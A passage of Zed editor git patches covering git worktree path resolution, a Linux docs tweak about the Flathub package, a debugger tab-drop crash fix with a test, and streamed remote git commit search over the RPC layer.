dot_git_abs_path.as_path().into(); + let (_, common_dir_abs_path) = discover_git_paths(&dot_git_abs_path, fs.as_ref()).await; - let dot_git_path: Arc = ancestor_dot_git.into(); - let (_, common_dir_abs_path) = discover_git_paths(&dot_git_path, fs.as_ref()).await; let repo_exclude_abs_path = common_dir_abs_path.join(REPO_EXCLUDE); if let Ok(repo_exclude) = build_gitignore(&repo_exclude_abs_path, fs.as_ref()).await { exclude = Some(Arc::new(repo_exclude)); } - // Reached root of git repository. + if index != 0 { + let location_in_repo = root_abs_path + .as_path() + .strip_prefix(ancestor) + .unwrap() + .into(); + log::info!("inserting parent git repo for this worktree: {location_in_repo:?}"); + // We associate the external git repo with our root folder and + // also mark where in the git repo the root folder is located. + return ( + ignores, + exclude, + Some(( + dot_git_abs_path.as_ref().into(), + WorkDirectory::AboveProject { + absolute_path: ancestor.into(), + location_in_repo, + }, + )), + ); + } + break; } } @@ -6285,6 +6294,26 @@ fn parse_gitfile(content: &str) -> anyhow::Result<&Path> { Ok(Path::new(path.trim())) } +fn resolve_gitfile_path(dot_git_abs_path: &Path, gitfile_path: &Path) -> PathBuf { + if gitfile_path.is_absolute() { + gitfile_path.into() + } else { + dot_git_abs_path + .parent() + .unwrap_or_else(|| Path::new("")) + .join(gitfile_path) + } +} + +fn resolve_commondir_path(repository_dir_abs_path: &Path, commondir_path: &str) -> PathBuf { + let commondir_path = Path::new(commondir_path.trim()); + if commondir_path.is_absolute() { + commondir_path.into() + } else { + repository_dir_abs_path.join(commondir_path) + } +} + pub async fn discover_root_repo_common_dir(root_abs_path: &Path, fs: &dyn Fs) -> Option> { let root_dot_git = root_abs_path.join(DOT_GIT); if !fs.metadata(&root_dot_git).await.is_ok_and(|m| m.is_some()) { @@ -6306,17 +6335,14 @@ async fn discover_git_paths(dot_git_abs_path: &Arc, fs: &dyn Fs) -> (Arc

Date: Mon, 4 May 2026 10:22:19 -0600 Subject: [PATCH 167/231] Remove Flatpak warning now that sandboxing is reverted (#55673) Self-Review Checklist: - [ ] I've reviewed my own diff for quality, security, and reliability - [ ] Unsafe blocks (if any) have justifying comments - [ ] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [ ] Tests cover the new/changed behavior - [ ] Performance impact has been considered and is acceptable Closes #ISSUE Release Notes: - N/A --- docs/src/linux.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/docs/src/linux.md b/docs/src/linux.md index b15db66d8da44a..6ebb179db3389b 100644 --- a/docs/src/linux.md +++ b/docs/src/linux.md @@ -53,7 +53,7 @@ There are several third-party Zed packages for various Linux distributions and p - Parabola: [`zed`](https://www.parabola.nu/packages/extra/x86_64/zed/) - ALT Linux (Sisyphus): [`zed`](https://packages.altlinux.org/en/sisyphus/srpms/zed/) - AOSC OS: [`zed`](https://packages.aosc.io/packages/zed) -- Flathub: [`dev.zed.Zed`](https://flathub.org/apps/dev.zed.Zed) (WARNING: [Sandboxing causes problems](https://github.com/flathub/dev.zed.Zed/pull/275)) +- Flathub: [`dev.zed.Zed`](https://flathub.org/apps/dev.zed.Zed) See [Repology](https://repology.org/project/zed-editor/versions) for a list of Zed packages in various repositories. From 95cb0fac6c5bdb1933a04d685a78d8763f66860a Mon Sep 17 00:00:00 2001 From: Lukas Wirth Date: Mon, 4 May 2026 18:31:27 +0200 Subject: [PATCH 168/231] debugger_ui: Fix debugger tab drop crash (#55667) Avoid reading the source debugger pane during SubView drop handling because it may be the Pane currently being updated. Use the DraggedTab item handle to validate the drop and capture the item id, leaving source-pane reads to the deferred move. Add a regression test for a stale SubView host pane during tab drop. Fixes ZED-74F Release Notes: - N/A or Added/Fixed/Improved ... --- crates/debugger_ui/src/session/running.rs | 106 ++++++++++++++++++++-- 1 file changed, 98 insertions(+), 8 deletions(-) diff --git a/crates/debugger_ui/src/session/running.rs b/crates/debugger_ui/src/session/running.rs index c273778ec38527..c496aa193a92d9 100644 --- a/crates/debugger_ui/src/session/running.rs +++ b/crates/debugger_ui/src/session/running.rs @@ -323,20 +323,15 @@ impl Item for SubView { let Some(this_pane) = self.host_pane.upgrade() else { return true; }; - let item = if tab.pane == this_pane { - active_pane.item_for_index(tab.ix) - } else { - tab.pane.read(cx).item_for_index(tab.ix) - }; - let Some(item) = item.filter(|item| item.downcast::().is_some()) else { + if tab.item.downcast::().is_none() { return true; - }; + } let Some(split_direction) = active_pane.drag_split_direction() else { return false; }; let source = tab.pane.clone(); - let item_id_to_move = item.item_id(); + let item_id_to_move = tab.item.item_id(); let weak_running = self.running_state.clone(); // Source pane may be the one currently updated, so defer the move. @@ -1980,3 +1975,98 @@ impl Focusable for RunningState { self.focus_handle.clone() } } + +#[cfg(test)] +mod tests { + use super::*; + use crate::{ + debugger_panel::DebugPanel, + tests::{init_test, init_test_workspace, start_debug_session}, + }; + use gpui::{BackgroundExecutor, TestAppContext, VisualTestContext}; + use project::{FakeFs, Project}; + use serde_json::json; + use util::path; + + #[gpui::test] + async fn stale_subview_host_during_tab_drop_does_not_read_updating_source_pane( + executor: BackgroundExecutor, + cx: &mut TestAppContext, + ) { + init_test(cx); + + let fs = FakeFs::new(executor); + fs.insert_tree( + path!("/project"), + json!({ + "main.rs": "fn main() {}", + }), + ) + .await; + + let project = Project::test(fs, [path!("/project").as_ref()], cx).await; + let workspace = init_test_workspace(&project, cx).await; + let cx = &mut VisualTestContext::from_window(*workspace, cx); + + start_debug_session(&workspace, cx, |_| {}).expect("debug session starts"); + cx.run_until_parked(); + + let running_state = workspace + .update(cx, |multi_workspace, _window, cx| { + multi_workspace.workspace().update(cx, |workspace, cx| { + let debug_panel = workspace.panel::(cx).expect("debug panel"); + let active_session = debug_panel + .read(cx) + .active_session() + .expect("active debug session"); + active_session.read(cx).running_state().clone() + }) + }) + .expect("workspace update succeeds"); + + let (source_pane, stale_host_pane) = running_state.read_with(cx, |running_state, _| { + let panes = running_state.panes.panes(); + let mut panes = panes.into_iter(); + let source_pane = panes.next().expect("source pane").clone(); + let stale_host_pane = panes.next().expect("stale host pane").clone(); + (source_pane, stale_host_pane) + }); + + let dragged_tab = { + let source_pane_entity = source_pane.clone(); + source_pane.read_with(cx, |source_pane, _| { + let item = source_pane + .item_for_index(0) + .expect("source pane contains debugger subview") + .boxed_clone(); + DraggedTab { + pane: source_pane_entity, + item, + ix: 0, + detail: 0, + is_active: true, + } + }) + }; + + let active_subview = source_pane.read_with(cx, |source_pane, _| { + source_pane + .active_item() + .and_then(|item| item.downcast::()) + .expect("active item is a debugger subview") + }); + active_subview.update(cx, |subview, _| { + subview.set_host_pane(stale_host_pane.downgrade()); + }); + + source_pane.update_in(cx, |source_pane, window, cx| { + source_pane.handle_tab_drop( + &dragged_tab, + source_pane.active_item_index(), + true, + window, + cx, + ); + }); + } +} From 3cf816c91c34d1bc15dfeece3034908c63f56bb5 Mon Sep 17 00:00:00 2001 From: Anthony Eid <56899983+Anthony-Eid@users.noreply.github.com> Date: Mon, 4 May 2026 12:38:14 -0400 Subject: [PATCH 169/231] git_graph: Add remote support for search operations (#55167) ### Motivation This is the second of three PRs to add remote/collab support for the git graph and is a follow-up to #54468. I'm adding remote support for the search because it's not user accessible without the initial graph fetch having remote support, so it allows us to merge this without having to add full remote support. Collab guest support will be added in a follow-up PR. #### Summary For large repos, searching can take a while to fully stream in all matched results. For example, running a basic search on the Linux repo took over 10s for me. Because of that, we want to stream search results in chunks to downstream users to keep the time-to-first-match low. After this change, the first chunk gets sent back after ~50ms on the Linux repo from receiving the request. In order to accomplish that, I added a new proto client API that allows for a request to map to n responses. e.g. ```/dev/null/example.rs#L1-1 client.add_entity_stream_request_handler(Self::handle_search_commits); ``` Note: The proto API isn't supported over collab yet, that will be another PR Self-Review Checklist: - [x] I've reviewed my own diff for quality, security, and reliability - [x] Unsafe blocks (if any) have justifying comments - [x] The content is consistent with the [UI/UX checklist](https://github.com/zed-industries/zed/blob/main/CONTRIBUTING.md#uiux-checklist) - [x] Tests cover the new/changed behavior - [x] Performance impact has been considered and is acceptable Closes #ISSUE Release Notes: - N/A --------- Co-authored-by: cameron --- crates/client/src/client.rs | 29 ++ crates/fs/src/fake_git_repo.rs | 39 +- crates/project/src/git_store.rs | 132 +++++- crates/proto/proto/git.proto | 23 + crates/proto/proto/zed.proto | 4 +- crates/proto/src/proto.rs | 4 + crates/remote/src/remote_client.rs | 228 +++++++++- .../remote_server/src/remote_editing_tests.rs | 109 ++++- crates/rpc/src/peer.rs | 412 ++++++++++++++++-- crates/rpc/src/proto_client.rs | 96 +++- 10 files changed, 1016 insertions(+), 60 deletions(-) diff --git a/crates/client/src/client.rs b/crates/client/src/client.rs index 95f57a6279727c..5bc34320a87e1a 100644 --- a/crates/client/src/client.rs +++ b/crates/client/src/client.rs @@ -24,6 +24,7 @@ use futures::{ AsyncReadExt, FutureExt, SinkExt, Stream, StreamExt, TryFutureExt as _, TryStreamExt, channel::{mpsc, oneshot}, future::BoxFuture, + stream::BoxStream, }; use gpui::{App, AsyncApp, Entity, Global, Task, WeakEntity, actions}; use http_client::{HttpClient, HttpClientWithUrl, http, read_proxy_from_env}; @@ -1789,6 +1790,34 @@ impl ProtoClient for Client { self.request_dynamic(envelope, request_type).boxed() } + fn request_stream( + &self, + envelope: proto::Envelope, + request_type: &'static str, + ) -> BoxFuture<'static, Result>>> { + let client_id = self.id(); + let response = self.connection_id().map(|connection_id| { + self.peer + .request_stream_dynamic(connection_id, envelope, request_type) + }); + + async move { + log::debug!( + "rpc stream request start. client_id:{}. name:{}", + client_id, + request_type + ); + let response = response?.await; + log::debug!( + "rpc stream request opened. client_id:{}. name:{}", + client_id, + request_type + ); + response + } + .boxed() + } + fn send(&self, envelope: proto::Envelope, message_type: &'static str) -> Result<()> { log::debug!("rpc send. client_id:{}, name:{}", self.id(), message_type); let connection_id = self.connection_id()?; diff --git a/crates/fs/src/fake_git_repo.rs b/crates/fs/src/fake_git_repo.rs index 309b6a84a650a8..5f2cb0515ce757 100644 --- a/crates/fs/src/fake_git_repo.rs +++ b/crates/fs/src/fake_git_repo.rs @@ -1435,10 +1435,43 @@ impl GitRepository for FakeGitRepository { fn search_commits( &self, _log_source: LogSource, - _search_args: SearchCommitArgs, - _request_tx: Sender, + search_args: SearchCommitArgs, + request_tx: Sender, ) -> BoxFuture<'_, Result<()>> { - async { bail!("search_commits not supported for FakeGitRepository") }.boxed() + async move { + let query = if search_args.case_sensitive { + search_args.query.to_string() + } else { + search_args.query.to_lowercase() + }; + + let matching_shas = self.fs.with_git_state(&self.dot_git_path, false, |state| { + state + .commit_data + .iter() + .filter_map(|(sha, entry)| { + let FakeCommitDataEntry::Success(commit_data) = entry else { + return None; + }; + let message = if search_args.case_sensitive { + commit_data.message.to_string() + } else { + commit_data.message.to_lowercase() + }; + message.contains(&query).then_some(*sha) + }) + .collect::>() + })?; + + for sha in matching_shas { + if request_tx.send(sha).await.is_err() { + break; + } + } + + Ok(()) + } + .boxed() } fn commit_data_reader(&self) -> Result { diff --git a/crates/project/src/git_store.rs b/crates/project/src/git_store.rs index b30b943d032737..f5dd3bef95c033 100644 --- a/crates/project/src/git_store.rs +++ b/crates/project/src/git_store.rs @@ -20,7 +20,7 @@ use collections::HashMap; pub use conflict_set::{ConflictRegion, ConflictSet, ConflictSetSnapshot, ConflictSetUpdate}; use fs::{Fs, RemoveOptions}; use futures::{ - FutureExt, StreamExt, + FutureExt, SinkExt, Stream, StreamExt, channel::{ mpsc, oneshot::{self, Canceled}, @@ -680,6 +680,7 @@ impl GitStore { client.add_entity_request_handler(Self::handle_edit_ref); client.add_entity_request_handler(Self::handle_repair_worktrees); client.add_entity_request_handler(Self::handle_get_commit_data); + client.add_entity_stream_request_handler(Self::handle_search_commits); } pub fn is_local(&self) -> bool { @@ -2669,6 +2670,63 @@ impl GitStore { Ok(proto::GetCommitDataResponse { commits }) } + async fn handle_search_commits( + this: Entity, + envelope: TypedEnvelope, + mut cx: AsyncApp, + ) -> Result>> { + const CHUNK_SIZE: usize = 100; + + let repository_id = RepositoryId::from_proto(envelope.payload.repository_id); + let repository_handle = Self::repository_for_request(&this, repository_id, &mut cx)?; + let log_source = log_source_from_proto( + envelope + .payload + .log_source + .context("missing search commit log source")?, + )?; + let search_args = SearchCommitArgs { + query: SharedString::from(envelope.payload.query), + case_sensitive: envelope.payload.case_sensitive, + }; + + let (request_tx, request_rx) = async_channel::unbounded(); + repository_handle.update(&mut cx, |repository, cx| { + repository.search_commits(log_source, search_args, request_tx, cx); + }); + + let (mut response_tx, response_rx) = mpsc::unbounded(); + cx.background_spawn(async move { + let mut shas = Vec::new(); + + while let Ok(sha) = request_rx.recv().await { + shas.push(sha.to_string()); + + if shas.len() >= CHUNK_SIZE { + if response_tx + .send(Ok(proto::SearchCommitsResponse { + shas: mem::take(&mut shas), + })) + .await + .is_err() + { + return; + } + } + } + + if !shas.is_empty() { + response_tx + .send(Ok(proto::SearchCommitsResponse { shas })) + .await + .ok(); + } + }) + .detach(); + + Ok(response_rx) + } + async fn handle_edit_ref( this: Entity, envelope: TypedEnvelope, @@ -4974,6 +5032,7 @@ impl Repository { cx: &mut Context, ) { let repository_state = self.repository_state.clone(); + let repository_id = self.id; cx.background_spawn(async move { let repo_state = repository_state.await; @@ -4985,8 +5044,50 @@ impl Repository { .await .log_err(); } - Ok(RepositoryState::Remote(_)) => {} - Err(_) => {} + + Ok(RepositoryState::Remote(RemoteRepositoryState { client, project_id })) => { + let result = client + .request_stream(proto::SearchCommits { + project_id: project_id.to_proto(), + repository_id: repository_id.to_proto(), + log_source: Some(log_source_to_proto(&log_source)), + query: search_args.query.to_string(), + case_sensitive: search_args.case_sensitive, + }) + .await; + + let mut stream = match result { + Ok(stream) => stream, + Err(error) => { + log::error!("failed to search commits remotely: {error:?}"); + return; + } + }; + + while let Some(response) = stream.next().await { + let response = match response { + Ok(response) => response, + Err(error) => { + log::error!( + "failed to receive remote commit search results: {error:?}" + ); + return; + } + }; + + for sha in &response.shas { + let Ok(oid) = Oid::from_str(sha) else { + return; + }; + if request_tx.send(oid).await.is_err() { + return; + } + } + } + } + Err(error) => { + log::error!("failed to get repository state for commit search: {error}"); + } }; }) .detach(); @@ -8119,6 +8220,31 @@ fn deserialize_blame_buffer_response( Some(Blame { entries, messages }) } +fn log_source_to_proto(log_source: &LogSource) -> proto::GitLogSource { + proto::GitLogSource { + source: Some(match log_source { + LogSource::All => proto::git_log_source::Source::All(proto::GitLogSourceAll {}), + LogSource::Branch(branch) => proto::git_log_source::Source::Branch(branch.to_string()), + LogSource::Sha(sha) => proto::git_log_source::Source::Sha(sha.to_string()), + LogSource::Path(path) => proto::git_log_source::Source::Path(path.to_proto()), + }), + } +} + +fn log_source_from_proto(log_source: proto::GitLogSource) -> Result { + match log_source + .source + .context("git log source is missing source")? + { + proto::git_log_source::Source::All(_) => Ok(LogSource::All), + proto::git_log_source::Source::Branch(branch) => Ok(LogSource::Branch(branch.into())), + proto::git_log_source::Source::Sha(sha) => Ok(LogSource::Sha(Oid::from_str(&sha)?)), + proto::git_log_source::Source::Path(path) => { + Ok(LogSource::Path(RepoPath::from_proto(&path)?)) + } + } +} + fn commit_data_to_proto(commit: &CommitData) -> proto::CommitData { proto::CommitData { sha: commit.sha.to_string(), diff --git a/crates/proto/proto/git.proto b/crates/proto/proto/git.proto index cea288ea2a0b7a..afea6cf34a3eaa 100644 --- a/crates/proto/proto/git.proto +++ b/crates/proto/proto/git.proto @@ -693,3 +693,26 @@ message CommitData { message GetCommitDataResponse { repeated CommitData commits = 1; } + +message GitLogSourceAll {} + +message GitLogSource { + oneof source { + GitLogSourceAll all = 1; + string branch = 2; + string sha = 3; + string path = 4; + } +} + +message SearchCommits { + uint64 project_id = 1; + uint64 repository_id = 2; + GitLogSource log_source = 3; + string query = 4; + bool case_sensitive = 5; +} + +message SearchCommitsResponse { + repeated string shas = 1; +} diff --git a/crates/proto/proto/zed.proto b/crates/proto/proto/zed.proto index 28626e687a8f90..0c149fb2976844 100644 --- a/crates/proto/proto/zed.proto +++ b/crates/proto/proto/zed.proto @@ -480,7 +480,9 @@ message Envelope { GitCreateArchiveCheckpointResponse git_create_archive_checkpoint_response = 445; GitRestoreArchiveCheckpoint git_restore_archive_checkpoint = 446; GetCommitData get_commit_data = 447; - GetCommitDataResponse get_commit_data_response = 448; // current max + GetCommitDataResponse get_commit_data_response = 448; + SearchCommits search_commits = 449; + SearchCommitsResponse search_commits_response = 450; // current max } reserved 87 to 88; diff --git a/crates/proto/src/proto.rs b/crates/proto/src/proto.rs index 06a4b2b5cc044d..651e11354a9d36 100644 --- a/crates/proto/src/proto.rs +++ b/crates/proto/src/proto.rs @@ -358,6 +358,8 @@ messages!( (GitRepairWorktrees, Background), (GetCommitData, Background), (GetCommitDataResponse, Background), + (SearchCommits, Background), + (SearchCommitsResponse, Background), (GitWorktreesResponse, Background), (GitCreateWorktree, Background), (GitRemoveWorktree, Background), @@ -573,6 +575,7 @@ request_messages!( (GitEditRef, Ack), (GitRepairWorktrees, Ack), (GetCommitData, GetCommitDataResponse), + (SearchCommits, SearchCommitsResponse), (GitCreateWorktree, Ack), (GitRemoveWorktree, Ack), (GitRenameWorktree, Ack), @@ -767,6 +770,7 @@ entity_messages!( GitEditRef, GitRepairWorktrees, GetCommitData, + SearchCommits, GitCreateArchiveCheckpoint, GitRestoreArchiveCheckpoint, GitCreateWorktree, diff --git a/crates/remote/src/remote_client.rs b/crates/remote/src/remote_client.rs index a32d5dc75c7fcb..138238c5fd45cd 100644 --- a/crates/remote/src/remote_client.rs +++ b/crates/remote/src/remote_client.rs @@ -22,6 +22,7 @@ use futures::{ }, future::{BoxFuture, Shared, WeakShared}, select, select_biased, + stream::BoxStream, }; use gpui::{ App, AppContext as _, AsyncApp, BackgroundExecutor, BorrowAppContext, Context, Entity, @@ -1320,6 +1321,8 @@ impl RemoteConnectionOptions { #[cfg(test)] mod tests { use super::*; + use gpui::TestAppContext; + use rpc::{ErrorCodeExt, proto::ErrorCode}; #[test] fn test_ssh_display_name_prefers_nickname() { @@ -1341,6 +1344,137 @@ mod tests { assert_eq!(options.display_name(), "1.2.3.4"); } + + #[gpui::test] + async fn test_channel_client_request_stream_terminates_on_error(cx: &mut TestAppContext) { + let (incoming_tx, incoming_rx) = mpsc::unbounded::(); + let (outgoing_tx, mut outgoing_rx) = mpsc::unbounded::(); + + let client = + cx.update(|cx| ChannelClient::new(incoming_rx, outgoing_tx, cx, "test-client", false)); + + // The client sends RemoteStarted on startup; drain the outgoing channel + // so it doesn't block. + let _drain_outgoing = cx + .executor() + .spawn(async move { while outgoing_rx.next().await.is_some() {} }); + + let mut stream = client + .request_stream_dynamic(proto::Test { id: 0 }.into_envelope(0, None, None), "Test") + .await + .unwrap(); + + let request_id = 0; + + incoming_tx + .unbounded_send(proto::Test { id: 1 }.into_envelope(100, Some(request_id), None)) + .unwrap(); + + let first = stream.next().await.unwrap().unwrap(); + assert_eq!( + proto::Test::from_envelope(first).unwrap(), + proto::Test { id: 1 } + ); + + // Send an Error without a trailing EndStream. The Error alone should + // terminate the stream. + incoming_tx + .unbounded_send( + ErrorCode::Internal + .message("boom".to_string()) + .to_proto() + .into_envelope(101, Some(request_id), None), + ) + .unwrap(); + + let second = stream.next().await.unwrap(); + let error = second.unwrap_err(); + assert!( + format!("{error}").contains("boom"), + "expected error to surface server message, got: {error}" + ); + + assert!(stream.next().await.is_none()); + assert_eq!(client.stream_response_channels.lock().len(), 0); + } + + #[gpui::test] + async fn test_channel_client_dropping_stream_request_before_response_cleans_up_channel( + cx: &mut TestAppContext, + ) { + let (_incoming_tx, incoming_rx) = mpsc::unbounded::(); + let (outgoing_tx, mut outgoing_rx) = mpsc::unbounded::(); + + let client = + cx.update(|cx| ChannelClient::new(incoming_rx, outgoing_tx, cx, "test-client", false)); + + let _drain_outgoing = cx + .executor() + .spawn(async move { while outgoing_rx.next().await.is_some() {} }); + + let stream = client + .request_stream_dynamic(proto::Test { id: 0 }.into_envelope(0, None, None), "Test") + .await + .unwrap(); + + assert_eq!(client.stream_response_channels.lock().len(), 1); + + drop(stream); + cx.run_until_parked(); + + assert_eq!( + client.stream_response_channels.lock().len(), + 0, + "dropping a stream before any responses arrive should remove response channel bookkeeping" + ); + } + + #[gpui::test] + async fn test_channel_client_dropping_stream_request_before_completion( + cx: &mut TestAppContext, + ) { + let (incoming_tx, incoming_rx) = mpsc::unbounded::(); + let (outgoing_tx, mut outgoing_rx) = mpsc::unbounded::(); + + let client = + cx.update(|cx| ChannelClient::new(incoming_rx, outgoing_tx, cx, "test-client", false)); + + let _drain_outgoing = cx + .executor() + .spawn(async move { while outgoing_rx.next().await.is_some() {} }); + + let mut stream = client + .request_stream_dynamic(proto::Test { id: 0 }.into_envelope(0, None, None), "Test") + .await + .unwrap(); + + let request_id = 0; + + incoming_tx + .unbounded_send(proto::Test { id: 1 }.into_envelope(100, Some(request_id), None)) + .unwrap(); + let _ = stream.next().await.unwrap().unwrap(); + + assert_eq!(client.stream_response_channels.lock().len(), 1); + + drop(stream); + + // Inject an orphaned non-terminal response. The read loop should detect + // that the consumer has been dropped and clean up its bookkeeping (no + // EndStream sent here on purpose, otherwise the cleanup would happen + // via the terminal-response path and mask the bug under test). + incoming_tx + .unbounded_send(proto::Test { id: 2 }.into_envelope(101, Some(request_id), None)) + .unwrap(); + + cx.run_until_parked(); + + assert_eq!( + client.stream_response_channels.lock().len(), + 0, + "stream channel should be removed once the consumer has dropped the stream" + ); + } } impl From for RemoteConnectionOptions { @@ -1418,6 +1552,8 @@ pub trait RemoteConnection: Send + Sync { } type ResponseChannels = Mutex)>>>; +type StreamResponseChannels = + Arc, oneshot::Sender<()>)>>>>; struct Signal { tx: Mutex>>, @@ -1455,6 +1591,7 @@ pub(crate) struct ChannelClient { outgoing_tx: Mutex>, buffer: Mutex>, response_channels: ResponseChannels, + stream_response_channels: StreamResponseChannels, message_handlers: Mutex, max_received: AtomicU32, name: &'static str, @@ -1477,6 +1614,7 @@ impl ChannelClient { next_message_id: AtomicU32::new(0), max_received: AtomicU32::new(0), response_channels: ResponseChannels::default(), + stream_response_channels: StreamResponseChannels::default(), message_handlers: Default::default(), buffer: Mutex::new(VecDeque::new()), name, @@ -1550,13 +1688,40 @@ impl ChannelClient { if let Some(request_id) = incoming.responding_to { let request_id = MessageId(request_id); + // An incoming response with no payload is malformed; drop + // it. The request future and any stream consumers will + // remain pending until either a real response arrives or + // the connection is torn down. + if incoming.payload.is_none() { + continue; + } let sender = this.response_channels.lock().remove(&request_id); if let Some(sender) = sender { let (tx, rx) = oneshot::channel(); - if incoming.payload.is_some() { - sender.send((incoming, tx)).ok(); - } + sender.send((incoming, tx)).ok(); rx.await.ok(); + } else { + let terminal_stream_response = matches!( + &incoming.payload, + Some(proto::envelope::Payload::Error(_)) + | Some(proto::envelope::Payload::EndStream(_)) + ); + let sender = if terminal_stream_response { + this.stream_response_channels.lock().remove(&request_id) + } else { + this.stream_response_channels + .lock() + .get(&request_id) + .cloned() + }; + if let Some(sender) = sender { + let (tx, rx) = oneshot::channel(); + if sender.unbounded_send((Ok(incoming), tx)).is_err() { + this.stream_response_channels.lock().remove(&request_id); + continue; + } + rx.await.ok(); + } } } else if let Some(envelope) = build_typed_envelope(peer_id, Instant::now(), incoming) @@ -1721,6 +1886,55 @@ impl ChannelClient { } } + fn request_stream_dynamic( + &self, + mut envelope: proto::Envelope, + type_name: &'static str, + ) -> impl 'static + Future>>> { + envelope.id = self.next_message_id.fetch_add(1, SeqCst); + let message_id = MessageId(envelope.id); + let (tx, rx) = mpsc::unbounded(); + let stream_response_channels = self.stream_response_channels.clone(); + stream_response_channels.lock().insert(message_id, tx); + + let result = self.send_buffered(envelope); + async move { + if let Err(error) = &result { + log::error!("failed to send message: {error}"); + anyhow::bail!("failed to send message: {error}"); + } + + let cleanup_stream_response_channel = util::defer({ + let stream_response_channels = stream_response_channels.clone(); + move || { + stream_response_channels.lock().remove(&message_id); + } + }); + + Ok(rx + .filter_map(move |(response, _barrier)| { + // Keep the cleanup guard alive until the returned stream is dropped. + let _keep_cleanup_guard_alive = &cleanup_stream_response_channel; + futures::future::ready(match response { + Ok(response) => { + if let Some(proto::envelope::Payload::Error(error)) = &response.payload + { + Some(Err(RpcError::from_proto(error, type_name))) + } else if let Some(proto::envelope::Payload::EndStream(_)) = + &response.payload + { + None + } else { + Some(Ok(response)) + } + } + Err(error) => Some(Err(error)), + }) + }) + .boxed()) + } + } + pub fn send_dynamic(&self, mut envelope: proto::Envelope) -> Result<()> { envelope.id = self.next_message_id.fetch_add(1, SeqCst); self.send_buffered(envelope) @@ -1751,6 +1965,14 @@ impl ProtoClient for ChannelClient { self.request_dynamic(envelope, request_type, true).boxed() } + fn request_stream( + &self, + envelope: proto::Envelope, + request_type: &'static str, + ) -> BoxFuture<'static, Result>>> { + self.request_stream_dynamic(envelope, request_type).boxed() + } + fn send(&self, envelope: proto::Envelope, _message_type: &'static str) -> Result<()> { self.send_dynamic(envelope) } diff --git a/crates/remote_server/src/remote_editing_tests.rs b/crates/remote_server/src/remote_editing_tests.rs index 825c0ba26c0474..d31403275cbb14 100644 --- a/crates/remote_server/src/remote_editing_tests.rs +++ b/crates/remote_server/src/remote_editing_tests.rs @@ -11,7 +11,10 @@ use languages::rust_lang; use extension::ExtensionHostProxy; use fs::{FakeFs, Fs}; -use git::repository::Worktree as GitWorktree; +use git::{ + Oid, + repository::{CommitData, Worktree as GitWorktree}, +}; use gpui::{AppContext as _, Entity, SharedString, TestAppContext}; use http_client::{BlockedHttpClient, FakeHttpClient}; use language::{ @@ -29,11 +32,13 @@ use project::{ search::{SearchQuery, SearchResult}, }; use remote::RemoteClient; +use rpc::proto; use serde_json::json; use settings::{Settings, SettingsLocation, SettingsStore, initial_server_settings_content}; use smol::stream::StreamExt; use std::{ path::{Path, PathBuf}, + str::FromStr, sync::Arc, }; use unindent::Unindent as _; @@ -1626,6 +1631,108 @@ async fn test_remote_root_repo_common_dir(cx: &mut TestAppContext, server_cx: &m assert_eq!(common_dir, None); } +#[gpui::test] +async fn test_remote_search_commits_streams_proto_chunks( + cx: &mut TestAppContext, + server_cx: &mut TestAppContext, +) { + const COMMIT_COUNT: usize = 900; + const RESPONSE_MAX_SIZE: usize = 100; + + let fs = FakeFs::new(server_cx.executor()); + fs.insert_tree( + path!("/code"), + json!({ + "project1": { + ".git": {}, + "file.txt": "content", + }, + }), + ) + .await; + + let commit_data = (0..COMMIT_COUNT) + .map(|index| { + let sha = Oid::from_str(&format!("{:040x}", index + 1)).unwrap(); + ( + CommitData { + sha, + parents: Default::default(), + author_name: SharedString::from("Author"), + author_email: SharedString::from("author@example.com"), + commit_timestamp: index as i64, + subject: SharedString::from(format!("Subject {index}")), + message: SharedString::from(format!("needle commit {index}")), + }, + false, + ) + }) + .collect::>(); + let expected_shas = commit_data + .iter() + .map(|(commit_data, _)| commit_data.sha.to_string()) + .collect::>(); + fs.set_commit_data(Path::new(path!("/code/project1/.git")), commit_data); + + let (project, _headless) = init_test(&fs, cx, server_cx).await; + project + .update(cx, |project, cx| { + project.find_or_create_worktree(path!("/code/project1"), true, cx) + }) + .await + .expect("should open remote worktree"); + server_cx.run_until_parked(); + cx.run_until_parked(); + project + .update(cx, |project, cx| project.git_scans_complete(cx)) + .await; + + let (remote_client, repository_id) = project.read_with(cx, |project, cx| { + let repository = project + .active_repository(cx) + .expect("remote project should have an active repository"); + let repository_id = repository.read(cx).snapshot().id; + let remote_client = project + .remote_client() + .expect("project should have a remote client"); + (remote_client, repository_id) + }); + let proto_client = remote_client.read_with(cx, |remote_client, _| remote_client.proto_client()); + let mut stream = proto_client + .request_stream(proto::SearchCommits { + project_id: proto::REMOTE_SERVER_PROJECT_ID, + repository_id: repository_id.to_proto(), + log_source: Some(proto::GitLogSource { + source: Some(proto::git_log_source::Source::All( + proto::GitLogSourceAll {}, + )), + }), + query: "needle".to_string(), + case_sensitive: true, + }) + .await + .expect("search commits stream should start"); + + let mut chunks = Vec::new(); + while let Some(response) = futures::StreamExt::next(&mut stream).await { + chunks.push(response.expect("search commits chunk should succeed").shas); + } + + assert!( + chunks.len() > 1, + "expected search results to stream in multiple chunks" + ); + for chunk in chunks.iter().take(chunks.len() - 1) { + assert!( + chunk.len() <= RESPONSE_MAX_SIZE, + "non-final chunks should meet the target byte size" + ); + } + + let actual_shas = chunks.into_iter().flatten().collect::>(); + assert_eq!(actual_shas, expected_shas); +} + #[gpui::test] async fn test_remote_archive_git_operations_are_supported( cx: &mut TestAppContext, diff --git a/crates/rpc/src/peer.rs b/crates/rpc/src/peer.rs index 73be0f19fe20ba..d9f34d0dc59ea5 100644 --- a/crates/rpc/src/peer.rs +++ b/crates/rpc/src/peer.rs @@ -8,7 +8,7 @@ use super::{ use anyhow::{Context as _, Result, anyhow}; use collections::HashMap; use futures::{ - FutureExt, SinkExt, Stream, StreamExt, TryFutureExt, + FutureExt, SinkExt, StreamExt, TryFutureExt, channel::{mpsc, oneshot}, stream::BoxStream, }; @@ -278,11 +278,23 @@ impl Peer { ); let response_channel = response_channels.lock().as_mut()?.remove(&responding_to); - let stream_response_channel = stream_response_channels - .lock() - .as_ref()? - .get(&responding_to) - .cloned(); + let terminal_stream_response = matches!( + &incoming.payload, + Some(proto::envelope::Payload::Error(_)) + | Some(proto::envelope::Payload::EndStream(_)) + ); + let stream_response_channel = if terminal_stream_response { + stream_response_channels + .lock() + .as_mut()? + .remove(&responding_to) + } else { + stream_response_channels + .lock() + .as_ref()? + .get(&responding_to) + .cloned() + }; if let Some(tx) = response_channel { let requester_resumed = oneshot::channel(); @@ -319,21 +331,15 @@ impl Peer { ?error, 